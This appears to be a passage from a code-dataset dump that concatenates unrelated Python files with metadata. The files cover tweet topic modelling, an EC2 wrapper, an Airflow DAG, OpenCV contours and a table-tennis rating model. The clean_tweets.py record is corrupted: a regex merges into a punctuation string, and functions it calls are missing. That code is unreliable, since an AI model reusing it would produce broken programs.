self.inOrder(root.right)\n\n","sub_path":"98.validate-binary-search-tree.py","file_name":"98.validate-binary-search-tree.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"478012894","text":"import re\nimport nltk\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\n\nnltk.download('stopwords')\nimport pandas as pd\n\n\ndef clean_all_tweets_apply_model(df, curr_1, curr_2, ccypair):\n # Identifying retweets\n df['is_retweet'] = df['Message'].apply(lambda x: x[:2] == 'RT')\n df['is_retweet'].sum()\n\n # Most repeated tweets, top 10\n res = df.groupby(['Message']).size().reset_index(name='Freq').sort_values('Freq', ascending=False).head(10)\n res.reset_index(drop=True, inplace=True)\n\n def retweets(tweet):\n return re.findall('(?<=RT\\s)(@[A-Za-z]+[A-Za-z0-9-_]+)', tweet)\n\n def mentions(tweet):\n return re.findall('(??[\\\\]^_`{|}~•@'\n\n # cleaning master function\n def clean_tweet(tweet, bigrams=False):\n tweet = remove_users(tweet)\n tweet = remove_links(tweet)\n tweet = tweet.lower() # lower case\n tweet = re.sub('[' + my_punctuation + ']+', ' ', tweet) # strip punctuation\n tweet = re.sub('\\s+', ' ', tweet) # remove double spacing\n tweet = re.sub('([0-9]+)', '', tweet) # remove numbers\n tweet = re.sub(curr_1, '', tweet) # remove numbers\n tweet = re.sub(curr_2, '', tweet) # remove numbers\n tweet = re.sub(ccypair, '', tweet) # remove numbers\n\n tweet_token_list = [word for word in tweet.split(' ')\n if word not in my_stopwords] # remove stopwords\n\n # tweet_token_list = [word_rooter(word) if '#' not in word else word\n # for word in tweet_token_list] # apply word rooter\n if bigrams:\n tweet_token_list = tweet_token_list + [tweet_token_list[i] + '_' + tweet_token_list[i + 1]\n for i in range(len(tweet_token_list) - 1)]\n tweet = ' '.join(tweet_token_list)\n return tweet\n\n df['clean_tweet'] = df.Message.apply(clean_tweet)\n\n # Applying Topic Modeling\n # the vectorizer object will be used to transform text to vector form\n vectorizer = CountVectorizer(token_pattern='\\w+|\\$[\\d\\.]+|\\S+')\n\n # apply transformation\n tf = vectorizer.fit_transform(df['clean_tweet']).toarray()\n\n # tf_feature_names tells us what word each column in the matric represents\n tf_feature_names = vectorizer.get_feature_names()\n\n number_of_topics = 5\n\n model = LatentDirichletAllocation(n_components=number_of_topics, random_state=0)\n model.fit(tf)\n\n def display_topics(model, feature_names, no_top_words):\n topic_dict = {}\n for topic_idx, topic in enumerate(model.components_):\n topic_dict[\"Topic %d words\" % (topic_idx)] = ['{}'.format(feature_names[i])\n for i in topic.argsort()[:-no_top_words - 1:-1]]\n topic_dict[\"Topic %d weights\" % (topic_idx)] = ['{:.1f}'.format(topic[i])\n for i in topic.argsort()[:-no_top_words - 1:-1]]\n return pd.DataFrame(topic_dict)\n\n no_top_words = 10\n lda_res = display_topics(model, tf_feature_names, no_top_words)\n\n # Log Likelyhood: Higher the better\n print(\"Log Likelihood: \", model.score(tf))\n\n # Perplexity: Lower the better. Perplexity = exp(-1. 
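# Hedged sketch related to the BST record above: the inorder-traversal variant there
# materialises the whole value list first; tracking only the previous value gives the
# same O(n) check with early exit (assumes the record's TreeNode shape):
def is_valid_bst_prev(root):
    prev, stack, node = None, [], root
    while stack or node:
        while node:                       # descend to the leftmost unvisited node
            stack.append(node)
            node = node.left
        node = stack.pop()
        if prev is not None and node.val <= prev:
            return False                  # inorder sequence must be strictly increasing
        prev = node.val
        node = node.right
    return True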
* log-likelihood per word)\n print(\"Perplexity: \", model.perplexity(tf))\n\n log_likelihodd = model.score(tf)\n perplexity = model.perplexity(tf)\n\n return res, hashtags_list_df, lda_res, log_likelihodd, perplexity","sub_path":"clean_tweets.py","file_name":"clean_tweets.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"433053586","text":"from typing import List\n\nfrom .....source_shared.base import Base\nfrom .....utilities.byte_io_mdl import ByteIO\nfrom .model import Model\n\n\nclass BodyPart(Base):\n def __init__(self):\n self.models = [] # type: List[Model]\n\n def read(self, reader: ByteIO):\n entry = reader.tell()\n model_count, model_offset = reader.read_fmt('II')\n\n with reader.save_current_pos():\n reader.seek(entry + model_offset)\n for _ in range(model_count):\n model = Model()\n model.read(reader)\n self.models.append(model)\n","sub_path":"source1/vtx/v6/structs/bodypart.py","file_name":"bodypart.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89731009","text":"\n\nfrom xai.brain.wordbase.nouns._byway import _BYWAY\n\n#calss header\nclass _BYWAYS(_BYWAY, ):\n\tdef __init__(self,): \n\t\t_BYWAY.__init__(self)\n\t\tself.name = \"BYWAYS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"byway\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_byways.py","file_name":"_byways.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342044775","text":"import logging\r\nimport os\r\nimport torch\r\nimport argparse\r\nimport json\r\nimport numpy as np\r\nimport sys\r\n\r\n\r\ndef app_path():\r\n \"\"\"Returns the base application path.\"\"\"\r\n if hasattr(sys, 'frozen'):\r\n # Handles PyInstaller\r\n return os.path.dirname(sys.executable).replace(\"\\\\\", \"/\")\r\n return os.path.dirname(__file__).replace(\"\\\\\", \"/\")\r\n\r\n\r\ndef get_args(filename='commandline_args.txt'):\r\n parser = argparse.ArgumentParser()\r\n args = parser.parse_args()\r\n with open(filename, 'r') as f:\r\n args.__dict__ = json.load(f)\r\n return args\r\n\r\n\r\ndef get_logger():\r\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\r\n datefmt='%m/%d/%Y %H:%M:%S',\r\n level=logging.INFO)\r\n return logging.getLogger(__name__)\r\n\r\n\r\ndef set_environ():\r\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n\r\ndef label_from_output(output):\r\n _, top_i = output.data.topk(1)\r\n return top_i[0]\r\n\r\n\r\n# returns a python float\r\ndef to_scalar(var):\r\n return var.view(-1).data.tolist()[0]\r\n\r\n\r\n# return the argmax as a python int\r\ndef argmax(vec):\r\n _, idx = torch.max(vec, 1)\r\n return to_scalar(idx)\r\n\r\n\r\n# Compute log sum exp in a numerically stable way for the forward algorithm\r\ndef log_sum_exp(vec):\r\n max_score = vec[0, argmax(vec)]\r\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\r\n return max_score + torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\r\n\r\n\r\ndef adjust_learning_rate(optimizer, t=0.9):\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] *= t\r\n\r\n\r\ndef get_learning_rate(optimizer):\r\n lr = []\r\n for param_group in optimizer.param_groups:\r\n lr.append(param_group['lr'])\r\n return lr\r\n\r\n# 
convert a label to a one-hot encoding\r\ndef one_hot(y, label_num=2):\r\n    label = torch.LongTensor(np.zeros(label_num)).to(y.device)\r\n    for i in range(label_num):\r\n        if i == float(y[0]):\r\n            label[i] = 1\r\n    return label\r\n\r\n\r\ndef build():\r\n    # SETUP_PATH = app_path()\r\n    PyInstaller.__main__.run([\r\n        '--name=%s' % \"main\",  # name of the generated exe\r\n        ['--onedir', '--onefile'][0],  # single directory or single file\r\n        '--noconfirm',  # Replace output directory without asking for confirmation\r\n        ['--windowed', '--console'][1],\r\n        # '--add-binary=./python3.dll;.',  # bundle external binaries\r\n        # '--add-binary=%s' % SETUP_PATH + '/config/logging.yaml;config',  # configuration file\r\n        # '--add-data=%s' % SETUP_PATH + '/config/config.ini;config',  # semicolon-separated: source path first, then the directory it is added to\r\n        # '--hidden-import=%s' % 'sqlalchemy.ext.baked',\r\n        # '--hidden-import=%s' % 'frozen_dir',  # add packages manually to work around 'module not found'\r\n        'main.py',  # entry-point file\r\n    ])\r\n\r\n\r\nif __name__ == '__main__':\r\n    import PyInstaller.__main__\r\n    build()","sub_path":"process_control.py","file_name":"process_control.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"508113674","text":"import boto3\nfrom AWSWrapper.Instance import Instance\n\n\nec2_resource = boto3.resource('ec2')\nec2_client = boto3.client('ec2')\n\n\nclass Instances:\n\n    def __init__(self):\n        self.instance_list = []\n        self.add_existing_instances()\n\n    def add_existing_instances(self):\n        for instance in ec2_resource.instances.all():\n            self.instance_list.append(Instance(instance.id))\n\n\n    def get_all_info(self):\n        instances_info = {}\n\n        for instance in self.instance_list:\n            instances_info[instance.instance_id] = instance.get_info()\n        return instances_info\n\n    # Add key pair functionality to both #\n    def launch_named_instance(self, name, image_id):\n        instance = ec2_resource.create_instances(\n            ImageId=image_id,\n            MaxCount=1,\n            MinCount=1,\n            TagSpecifications=[\n                {\n                    'ResourceType': 'instance',\n                    'Tags': [  # boto3 expects a list of {'Key': ..., 'Value': ...} dicts here\n                        {\n                            'Key': 'Name',\n                            'Value': name\n                        }\n                    ]\n                }\n            ]\n        )\n\n    def launch_instance(self, image_id):\n        instance = ec2_resource.create_instances(\n            ImageId=image_id,\n            MaxCount=1,\n            MinCount=1\n        )\n","sub_path":"AWSWrapper/Instances.py","file_name":"Instances.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"110972042","text":"class LevelDef:\n    def __init__(self, aName = \"???\"):\n        self.name = aName;\n        self.plusNumber = 1;\n        self.minusNumber = 1;\n        self.ghostEntries = list();\n        self.diamondDropAmount = 1;\n        self.ghostsDefeatedForDiamondDrop = 1;\n        self.totalSeconds = 60;\n        self.enemyAmount = 1;\n\nglobal LIST;\nLIST = list();\n    \n    \n#This is the way to add levels:\n\nlv = LevelDef(\"1: positives\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [1,2,3,4,5];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\n#TODO: Add more levels here:\n\nlv = LevelDef(\"2: negatives\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [-1,-2,-3,-4,-5];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\nlv = LevelDef(\"3: negatives and positives\");\nlv.plusNumber = 1;\nlv.minusNumber = 1;\nlv.ghostEntries = [1,-2,3,-4,5];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\nlv = LevelDef(\"4: going toward 
negatives by accident\");\nlv.plusNumber = 1;\nlv.minusNumber = 4;\nlv.ghostEntries = [3,9,7,3,11];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 1;\nLIST.append(lv);\n\nlv = LevelDef(\"5: handling parities and disparities\");\nlv.plusNumber = 3;\nlv.minusNumber = 2;\nlv.ghostEntries = [-3,-7,8,12,17,6];\nlv.diamondDropAmount = 2;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\nlv = LevelDef(\"6: handling parities and disparities, more difficult\");\nlv.plusNumber = 5;\nlv.minusNumber = 3;\nlv.ghostEntries = [-4,-8,11,15,-17,8];\nlv.diamondDropAmount = 3;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\n\nlv = LevelDef(\"7: evens and somewhat complicated\");\nlv.plusNumber = 6;\nlv.minusNumber = 4;\nlv.ghostEntries = [2,-3,11,-15,-13,5,16];\nlv.diamondDropAmount = 3;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);\n\n\n\nlv = LevelDef(\"8: last floor, everything goes wrong, many ghosts, high numbers, little time, remainders, everything\");\nlv.plusNumber = 4;\nlv.minusNumber = 8;\nlv.ghostEntries = [43,-55,37,-57,-43,35,67,79,81];\nlv.diamondDropAmount = 4;\nlv.ghostsDefeatedForDiamondDrop = 1;\nlv.totalSeconds = 120;#60 * 3;\nlv.enemyAmount = 2;\nLIST.append(lv);","sub_path":"test/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"599911901","text":"\n# coding: utf-8\n\n# **Image segmentation** refers to the partition of an image into a set of regions that represent meaningful areas of the image. It has two objectives: (1) decomposition of the image into parts for further analysis; (2) performing a change of representation.\n\n# In[1]:\n\n\nimport cv2\nimport urllib\nfrom skimage import io, util\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom IPython.display import display\nget_ipython().magic(u'matplotlib inline')\nplt.rcParams['figure.figsize'] = (10.0, 10.0)\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# # Contours\n# \n# Continuous lines or curves. 
They are important for **object detection** and **shape analysis**\n\n# In[2]:\n\n\n#image = cv2.imread('./images/keyboard.jpg', 0)\nimage = cv2.imread('./images/keyboard.jpg')\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17) # blur the image (remove noise)\nio.imshow(gray)\nio.show()\n\n\n# In[3]:\n\n\ncanny = cv2.Canny(gray, 30, 200)\nio.imshow(canny)\nio.show()\n\n\n# In[4]:\n\n\n# find the contours\n\n#_, contours, hierarchy = cv2.findContours(canny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n_, contours, hierarchy = cv2.findContours(canny.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n#cv2.imshow('Canny Edges After Contouring', edged)\n#cv2.waitKey(0)\n\nprint((\"Number of Contours found = \" + str(len(contours))))\n\n\n# In[5]:\n\n\n# Draw all contours\n# Use '-1' as the 3rd parameter to draw all countours\ncv2.drawContours(image, contours, -1, (0,255,0), 3)\n\n#cv2.imshow('Contours', image)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\nio.imshow(image)\nio.show()\n\n\n# In[6]:\n\n\n# Find contour of my TI-84\n\n\n# In[7]:\n\n\nimage = cv2.imread('./images/TI84.jpg')\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17) # blur the image (remove noise)\nio.imshow(gray)\nio.show()\n\n\n# In[8]:\n\n\ncanny = cv2.Canny(gray, 30, 200)\nio.imshow(canny)\nio.show()\n\n\n# In[9]:\n\n\n# find contours in the edged image, keep only the largest\n# ones, and initialize our screen contour\n_, contours, hierarchy = cv2.findContours(canny.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\nprint((\"Number of Contours found = \" + str(len(contours))))\n\n\n# In[10]:\n\n\n# Draw all contours\n# Use '-1' as the 3rd parameter to draw all countours\ncv2.drawContours(image, contours, -1, (0,255,0), 3)\n\n#cv2.imshow('Contours', image)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\nio.imshow(image)\nio.show()\n\n","sub_path":"Image_Segmentation(contours)_Circle_Line_Blob_Detection.py","file_name":"Image_Segmentation(contours)_Circle_Line_Blob_Detection.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175072370","text":"# from airflow.contrib.hooks.fs_hook import FSHook\n#\n# from airflow.contrib.sensors.file_sensor import FileSensor\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\n\n#file place in /data/ds_env/..../packages-site/\nfrom omega_plugin_file import OmegaFileSensor, ArchiveFileOperator\n\n#installed using pip (check pip freez)\nfrom airflow.providers.papermill.operators.papermill import PapermillOperator\n\nimport datetime\nfrom datetime import date, timedelta\nimport airflow\n\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\n\nfrom textwrap import dedent\n\n\ndefault_args = {\n \"depends_on_past\" : False,\n \"start_date\" : airflow.utils.dates.days_ago( 1 ),\n \"retries\" : 1,\n \"retry_delay\" : datetime.timedelta( hours= 5 ),\n}\n\n\nuser = 'ys'\n\n\nwith airflow.DAG( \"A_ETL\", default_args= default_args, schedule_interval= \"@once\" ) as dag:\n start_task = DummyOperator( task_id= \"start\" )\n stop_task = DummyOperator( task_id= \"stop\" )\n \n Libraries_Installation = BashOperator(\n task_id='Libraries_Installation',\n bash_command=f'jupyter nbconvert --execute --clear-output 
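# Hedged compatibility sketch for the contour notebook above: cv2.findContours returns
# three values on OpenCV 3.x (as the notebook assumes) but only two on OpenCV 2.x and 4.x;
# indexing from the end absorbs both conventions:
def find_contours_compat(img, mode, method):
    result = cv2.findContours(img, mode, method)
    return result[-2]   # the contour list is the second-to-last element in every OpenCV version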
/home/{user}/notebook/Libraries_Installation.ipynb',\n )\n \n DS_Cleaning = BashOperator(\n task_id='DS_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DS_Cleaning.ipynb',\n )\n \n DSE_Cleaning = BashOperator(\n task_id='DSE_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DSE_Cleaning.ipynb',\n )\n \n Prof_Cleaning = BashOperator(\n task_id='Prof_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Prof_Cleaning.ipynb',\n ) \n \n DS_Insertion_to_DB = BashOperator(\n task_id='DS_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DS_Insertion_to_DB.ipynb',\n )\n \n \n DSE_Insertion_to_DB = BashOperator(\n task_id='DSE_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DSE_Insertion_to_DB.ipynb',\n )\n \n \n \n Prof_Insertion_to_DB = BashOperator(\n task_id='Prof_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Prof_Insertion_to_DB.ipynb',\n )\n \n \n \n Loggin_Data_Cleaning = BashOperator(\n task_id='Loggin_Data_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Loggin_Data_Cleaning.ipynb',\n )\n \n Logging_Data_Insertion_to_DB = BashOperator(\n task_id='Logging_Data_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Logging_Data_Insertion_to_DB.ipynb',\n )\n \n \n Statistics_Output = BashOperator(\n task_id='Statistics_Output',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Statistics_Output.ipynb',\n )\n\n trigger_again = TriggerDagRunOperator(\n task_id='trigger_dag_again', \n trigger_dag_id=\"A_ETL\", \n dag=dag\n )\n \nstart_task >> Libraries_Installation >> DS_Cleaning >> DSE_Cleaning >> Prof_Cleaning >> DS_Insertion_to_DB >> DSE_Insertion_to_DB >> Prof_Insertion_to_DB >> Loggin_Data_Cleaning >> Logging_Data_Insertion_to_DB >> Statistics_Output >> stop_task >> trigger_again","sub_path":"dag1.py","file_name":"dag1.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"489826496","text":"from Storages import *\nfrom BetsStorage import *\nfrom Entity import *\nfrom common import *\n\n\nclass TTModel:\n def __init__(self, dirname):\n\n self.playersDict = GlobalPlayersDict(mode='filtered', dirname=dirname + '/')\n\n self.rankingSources = []\n self.rankingSources.append(['ttfr', dirname + '/prepared_data/propingpong/ranking_rus.txt'])\n self.rankingSources.append(['ittf', dirname + '/prepared_data/propingpong/ranking_ittf.txt'])\n #self.rankingSources.append(['my', dirname + '/prepared_data/rankings/all_rankings_mw_fresh_sets_1.txt'])\n\n for ws in [730]:\n for matchesCntBorder in [4]:\n # for ws in [365, 730]:\n # for matchesCntBorder in [1, 4]:\n self.rankingSources.append(['ranking_my_' + str(ws) + '_' + str(matchesCntBorder),\n ['prepared_data/rankings/rankings_m_sets_sources=0_ws=' + str(\n ws) + '_matchesCntBorder=' + str(matchesCntBorder) + '.txt',\n 'prepared_data/rankings/rankings_w_sets_sources=0_ws=' + str(\n ws) + '_matchesCntBorder=' + str(matchesCntBorder) + '.txt']])\n\n self.rankingSources.append(['liga_pro', dirname + '/prepared_data/liga_pro/ranking_liga_pro.txt'])\n\n self.rankingsStorage = RankingsStorage(self.rankingSources)\n\n for ws in [730]:\n for matchesCntBorder in [4]:\n 
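# Hedged alternative sketch: the DAG record above imports PapermillOperator but never uses
# it; one of its nbconvert tasks could be expressed with it instead (the output path and
# parameters below are assumptions, not from the record):
DS_Cleaning_pm = PapermillOperator(
    task_id='DS_Cleaning_pm',
    input_nb=f'/home/{user}/notebook/DS_Cleaning.ipynb',
    output_nb=f'/home/{user}/notebook/DS_Cleaning_out.ipynb',
    parameters={'run_date': '{{ ds }}'},   # '{{ ds }}' is Airflow's execution-date macro
)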
rName = 'my_' + str(ws) + '_' + str(matchesCntBorder)\n self.rankingsStorage.readPlayersDayRankings('ranking_' + rName + '_day', 'test/dayRankings_m_' + rName + '.txt')\n self.rankingsStorage.readPlayersDayRankings('ranking_' + rName + '_day', 'test/dayRankings_w_' + rName + '.txt')\n\n\n self.players = dict()\n #self.playersDict = dict()\n for k, v in sorted(self.playersDict.id2names.items(), key=lambda x: x[0]):\n #self.playersDict[k] = len(self.players)\n self.players[k] = Player(k, v, k[0])\n\n with open(dirname + '/prepared_data/liga_pro/players_liga_pro.txt', encoding='utf-8') as fin:\n for line in fin:\n tokens = line.strip().split('\\t')\n self.players[tokens[0]].addHref('liga_pro', tokens[2])\n\n sources = list()\n sources.append(['master_tour', dirname + '/prepared_data/master_tour/all_results.txt'])\n sources.append(['liga_pro', dirname + '/prepared_data/liga_pro/all_results.txt'])\n sources.append(['challenger_series', dirname + '/prepared_data/challenger_series/all_results.txt'])\n sources.append(['bkfon', dirname + '/prepared_data/bkfon/all_results.txt'])\n sources.append(['local', dirname + '/prepared_data/local/kchr_results.txt'])\n sources.append(['ittf', dirname + '/prepared_data/ittf/all_results.txt'])\n sources.append(['rttf', dirname + '/prepared_data/rttf/all_results.txt'])\n\n self.matchesStorage = MatchesStorage(sources)\n self.sortMatches()\n\n self.competitionsStorage = CompetitionsStorage()\n for match in self.matches:\n compId = self.competitionsStorage.getCompId(match.compName)\n match.setCompId(compId)\n self.competitionsStorage.getComp(compId).addMatch(match)\n\n for match in self.matches:\n for i in range(2):\n for e in match.ids[i]:\n if e not in {'-', '?'}:\n self.players[e].matches.append(match)\n\n self.betsStorage = BetsStorage()\n self.betsStorage.loadFromFile(dirname + '/prepared_data/bkfon/live/tail.txt')\n # self.betsStorage.loadFromFile(dirname + '/prepared_data/bkfon/live/all_bets_prepared.txt')\n# self.matchesBetsStorage = MatchesBetsStorage(self.hash2matchInd,filename=)\n\n# self.bets = self.betsStorage.bets\n\n self.lastUpdateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')[:10] + ' 00:00:00'\n self.lastUpdateTime = '2017-06-12 13:53:00'\n\n self.n = len(self.matches)\n '''\n with open(r'D:\\Programming\\SportPrognoseSystem\\TTStat\\test\\model_3.pkl', 'rb') as fin:\n self.model = pickle.load(fin)\n '''\n\n self.predictionMachine = None\n\n def setPredictionMachine(self, predictionMachine):\n self.predictionMachine = predictionMachine\n self.predictionMachine.setRankingsStorage(self.rankingsStorage)\n self.predictionMachine.setMatchesStorage(self.matchesStorage)\n\n def sortMatches(self):\n self.matchesStorage.matches = list(sorted(self.matchesStorage.matches,\n key=lambda x: x.date + ', ' + (x.time if x.time else '-'), reverse=1))\n self.matches = self.matchesStorage.matches\n self.matchesStorage.buildHash2MatchInd()\n self.hash2matchInd = self.matchesStorage.hash2matchInd\n\n def addMatch(self, source, match):\n if match.compName.find('TT-CUP') != -1:\n return\n # print('models.addMatch', match.hash)\n isNew = self.matchesStorage.addMatch(source, match)\n if isNew is True:\n for i in range(2):\n for e in match.ids[i]:\n if e in self.players:\n self.players[e].matches.append(match)\n self.players[e].matches = list(sorted(self.players[e].matches,\n key=lambda x: x.date + ', ' + (x.time if x.time else '-'), reverse=1))\n\n self.rankingsStorage.addMatch(source, match)\n\n def update(self, rows):\n lastTime = None\n block = []\n 
rowNames = dict(zip(['id', 'datetime', 'eventId', 'compName', 'info'], range(5)))\n isFinished = False\n for row in rows:\n row = [str(e) for e in row]\n # print(row)\n curTime = str(row[1])\n if lastTime is not None and curTime != lastTime:\n finished = self.betsStorage.update(block)\n for finishedMatch in finished:\n print('FINISHED')\n print(finishedMatch.toStr())\n self.addMatch('bkfon_live', finishedMatch)\n isFinished = True\n block = []\n tokens = row[rowNames['info']].split('\\t')\n dt = row[rowNames['datetime']]\n eventsInfo = json.loads(tokens[2])\n # Старый формат в базе\n if len(eventsInfo) > 1:\n eventsInfo = [eventsInfo]\n names = [tokens[0].split(';'), tokens[1].split(';')]\n extraInfo = dict()\n score = eventsInfo[0][1]['match']['score']\n if names[0][0].startswith('Game'):\n try:\n names = [e.strip().split('\\\\') for e in score.split(')')[1].split('-')]\n assert len(names) == 2\n extraInfo['teams'] = [tokens[0].replace('Game', '').strip()[1:].strip().split(';'), tokens[1].strip().split(';')]\n extraInfo['game'] = tokens[0].replace('Game', '').strip()[0]\n except:\n names = [tokens[0].split(';'), tokens[1].split(';')]\n print('ERROR_SCORE', eventsInfo)\n else:\n try:\n extraInfo['round'] = score.split(')')[1].strip()\n if extraInfo['round'] == '':\n extraInfo.pop('round')\n except:\n pass\n ids = self.getMatchPlayersIds(names, compName=row[rowNames['compName']], date=dt[:10])\n block.append(MatchBet(row[rowNames['eventId']], dt, row[rowNames['compName']],\n ids, eventsInfo, names=names, extraInfo=extraInfo))\n self.lastUpdateTime = max(self.lastUpdateTime, curTime)\n lastTime = curTime\n if lastTime is not None:\n finished = self.betsStorage.update(block)\n for finishedMatch in finished:\n print('FINISHED')\n print(finishedMatch.toStr())\n self.addMatch('bkfon_live', finishedMatch)\n isFinished = True\n\n if isFinished is True:\n self.sortMatches()\n\n print(self.lastUpdateTime)\n\n def getPlayerNames(self, playerId):\n return self.playersDict.getNames(playerId)\n\n def getPlayerName(self, playerId):\n return self.playersDict.getName(playerId)\n\n def getMatchPlayersNames(self, ids):\n return [self.playersDict.getName(id) for id in ids]\n\n def getMatchPlayersIds(self, players, compName=None, date=None):\n # for i in range(2):\n # for playerName in players[i]:\n # playerIds = self.playersDict.getId(playerName)\n\n ids = [[], []]\n for i in range(2):\n for player in players[i]:\n player = ' '.join(player.split()).strip()\n playerId = self.playersDict.getId(player)\n if len(playerId) == 1:\n pass\n elif len(playerId) > 1:\n if compName is not None and date is not None:\n idGood = []\n source = 'bkfon'\n if compName.find('Мастер-Тур') != -1:\n source = 'master_tour'\n elif compName.find('Лига Про') != -1:\n source = 'liga_pro'\n\n for e in playerId:\n if self.matchesStorage.isActive(e, source, date):\n idGood.append(e)\n if len(idGood) == 1:\n playerId = idGood\n ids[i].append(','.join(playerId))\n\n return ids\n\n def getMatch(self, matchId):\n if matchId in self.hash2matchInd:\n return self.matches[self.hash2matchInd[matchId]]\n elif matchId in self.betsStorage.bets:\n return self.betsStorage.bets[matchId].getMatch()\n return None\n\n def getLiveBet(self, matchId):\n return self.betsStorage.getBet(matchId)\n return None\n\n def getFeatures(self, matchBet, dt):\n mb = dict()\n if matchBet is None:\n return dict()\n if len(matchBet.eventsInfo) != 0:\n mb = matchBet.eventsInfo[0][1].get('match', dict())\n allFeatures = \\\n self.predictionMachine.getFeatures(\n 
matchBet.getMatch(),\n dt,\n score=None,\n betInfo=mb\n )\n return allFeatures\n\n def predict(self, matchBet, dt, score=None, betInfo=None):\n pWin = \\\n self.predictionMachine.predict(\n matchBet.getMatch(),\n dt,\n score=score,\n betInfo=betInfo\n )\n return pWin\n\n def getRankings(self, playerId, curDate, ws=1):\n return self.rankingsStorage.getRankings(playerId, curDate, ws=ws)\n\n def makePrediction(self, playerId1, playerId2):\n # r1 = self.getFeatures(playerId1, datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n # r2 = self.getFeatures(playerId2, datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n # r1 = [float(e) for e in [r1['liga_pro'], r1['my']]]\n # r2 = [float(e) for e in [r2['liga_pro'], r2['my']]]\n # ff = [[r1[0] - r2[0], r1[1] - r2[1]]]\n # if r1[0] == -1 or r2[0] == -1:\n # ff[0][0] = 0\n # if r1[1] == -1 or r2[1] == -1:\n # ff[0][1] = 0\n # print(ff)\n # self.model = linear_model.LogisticRegression(fit_intercept=False)\n # self.model.coef_ = np.array([[ 0.00957611, 0.10476427]])\n # self.model.intercept_ = 0\n # '''\n # df1 = 